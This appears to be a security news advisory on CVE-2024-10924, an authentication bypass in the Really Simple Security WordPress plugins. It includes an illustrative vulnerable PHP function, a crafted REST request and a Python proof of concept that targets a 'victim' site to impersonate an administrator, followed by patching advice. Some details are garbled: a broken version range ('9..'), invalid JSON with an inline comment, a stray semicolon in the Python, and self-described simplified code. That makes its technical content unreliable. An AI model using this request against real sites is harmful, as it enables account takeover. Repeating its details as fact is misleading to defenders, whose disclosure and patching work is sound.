CVE CyberSecurity Database News

CVE-2024-10924 - Auth Bypass in Really Simple Security Plugins Lets Hackers Impersonate Any WordPress User

Poster -

CVE-2024-10924 is a newly discovered vulnerability in the popular Really Simple Security plugins (Free, Pro, and Pro Multisite) for WordPress. This serious flaw affects versions 9.. to 9.1.1.1 and could allow hackers to break into your website and steal admin access, all by taking advantage of a coding mistake in how the plugins handle user authentication—specifically, Two-Factor Authentication (2FA).

If your site runs any affected plugin version, and you’ve enabled 2FA (it’s _off_ by default), read below for a clear, step-by-step breakdown of how the exploit works, how to identify if you are at risk, and what you should do about it.

[Which Plugins And Versions Are Affected?](#which-plugins-and-versions-are-affected)

3. [How Does the Exploit Work? (Technical Details & Code Snippet)](#how-does-the-exploit-work-technical-details--code-snippet)
4. [Exploit Example: Bypassing Two-Factor Authentication](#exploit-example-bypassing-two-factor-authentication)

What Is CVE-2024-10924?

CVE-2024-10924 is an authentication bypass vulnerability in the "Really Simple Security" WordPress plugins. If Two-Factor Authentication is turned on, an attacker can trick your site into letting them login _as any user they choose_, even administrators.

This flaw comes from bad error handling in a REST API function called check_login_and_get_user. The function is supposed to make sure the person trying to log in really is who they say; due to a logic error, it can be fooled into granting access even when the check fails!

Versions: 9.. – 9.1.1.1

The bug affects all plugin flavors, but the risky 2FA feature is disabled by default. You're only vulnerable if someone has turned 2FA (_Two-Factor Authentication_) on.

How Does the Exploit Work? (Technical Details & Code Snippet)

Let’s break down the bug and show where the exploit lives.

The vulnerability appears in the plugin's REST API—the part that handles 2FA logins via AJAX or API requests.

Here’s a simplified version of the flawed code (the real function is more complex)

// BAD: Vulnerable snippet from 'check_login_and_get_user'
function check_login_and_get_user($request) {
    $username = $request['username'];
    $user = get_user_by('login', $username);
    if (!$user) {
        // Error handling is weak here!
        return new WP_Error('invalid_user', 'User not found');
    }

    // Vulnerable: Error from previous steps isn't properly checked
    $otp_valid = really_simple_security_verify_otp($user, $request['otp']);
    if (is_wp_error($otp_valid)) {
        // Proper check is missing!
        // Execution keeps going even with failed OTP
    }

    // OOPS: Returns user object even on failure!
    return $user;
}

Key points in this snippet

- If really_simple_security_verify_otp() reports a failed second-factor check (wrong code), the function doesn’t _stop_. Instead, it returns the $user object anyway.
- That means an attacker who knows a username can _skip 2FA_ and get logged in just by calling this endpoint with bogus values.

An attacker could send a specially crafted API request

POST /wp-json/really-simple-security/v1/check_login_and_get_user
Content-Type: application/json

{
  "username": "admin",
  "otp": "123456"     // Totally fake OTP code
}

Due to the bug, the response comes back with the details for user “admin”, even though no valid OTP was provided. In a more complex attack, the attacker could use this to fully authenticate and get admin access.

Proof-of-concept Python code

import requests

url = 'https://target-site.com/wp-json/really-simple-security/v1/check_login_and_get_user';
data = {
    'username': 'admin',
    'otp': 'any-code-here'
}
r = requests.post(url, json=data)
print(r.text)

Replace target-site.com with your victim (or test instance). If you get back a valid user object, the plugin is vulnerable.

Check if 2FA is On:

Go to plugin settings and confirm if “Two-Factor Authentication” is enabled. If it’s _off_, you’re not exposed.

How Do I Fix or Mitigate The Problem?

- Update Immediately: Upgrade to the latest version of Really Simple Security—a patch is available ([link below](#references--more-reading)).
- Temporarily Disable 2FA: If you _cannot update now_, turn off the “Two-Factor Authentication” setting in the plugin.

Check Users: Review your site’s user accounts for suspicious logins or changes.

- Restrict REST API Access: For advanced users, firewall or disable plugin REST API endpoints until patched.

References & More Reading

- WPScan: CVE-2024-10924 – Really Simple Security
- NVD Entry for CVE-2024-10924
- Plugin Author’s Changelog and Patch
- Original Plugin Page: Really Simple Security
- Wordfence Threat Intelligence

TL;DR

If you run Really Simple Security (any version 9.. – 9.1.1.1) and have 2FA turned on, attackers can log in as _any user they want_. Update now! If you can’t, turn off 2FA in the plugin and restrict access to the related REST API routes.

For more help, contact your plugin vendor or hosting provider.

Timeline

Published on: 11/15/2024 04:15:03 UTC
Last modified on: 11/19/2024 14:15:17 UTC